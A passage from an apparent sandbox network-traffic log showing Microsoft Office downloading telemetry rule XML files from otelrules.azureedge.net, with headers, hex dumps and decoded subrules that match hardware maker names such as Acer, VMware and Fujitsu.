                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 922c5f4e-601e-005c-577c-3bf06f000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201229Z-174c587ffdfp4vpjhC1TEBybqw00000003gg00000000115z
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:30 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    23192.168.2.54974413.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:29 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:29 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 486
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                                                    x-ms-request-id: aff2abcc-f01e-0003-4547-3c4453000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201229Z-178bfbc474bmqmgjhC1NYCy16c00000004wg00000000nrda
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:30 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    24192.168.2.54974513.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:29 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:29 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 407
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                                                    x-ms-request-id: d1e74057-c01e-0014-6563-3ba6a3000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201229Z-178bfbc474bwlrhlhC1NYCy3kg00000004x000000000e5y5
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:30 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    25192.168.2.54974813.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:32 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:32 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 477
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 44207c53-001e-0079-37ad-3b12e8000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201232Z-15b8b599d88hd9g7hC1TEBp75c00000003e00000000061mu
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:32 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    26192.168.2.54975013.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:32 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:32 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:32 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 494
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                                    x-ms-request-id: e7bb18f6-501e-000a-54a9-3b0180000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201232Z-174c587ffdfks6tlhC1TEBeza400000003cg00000000pngh
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:32 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    27192.168.2.54974613.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:32 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:32 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 469
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 63e0f5a8-701e-0032-207a-3ba540000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201232Z-174c587ffdf4zw2thC1TEBu34000000003gg000000008p4a
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:32 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    28192.168.2.54974913.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:32 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:33 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:32 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 464
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                                    x-ms-request-id: d05e48d4-001e-0065-1c06-3d0b73000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201232Z-178bfbc474bh5zbqhC1NYCkdug00000004w000000000bd7k
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:33 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    29192.168.2.54974713.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:32 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:32 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 9bf3f441-f01e-003f-246b-3bd19d000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201232Z-178bfbc474bv587zhC1NYCny5w00000004vg000000007dkb
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:33 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    30192.168.2.54975113.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:34 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:34 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 367ebca4-601e-0070-6762-3ba0c9000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201234Z-178bfbc474bpnd5vhC1NYC4vr400000004ug00000000mn13
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:35 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    31192.168.2.54975213.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:35 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
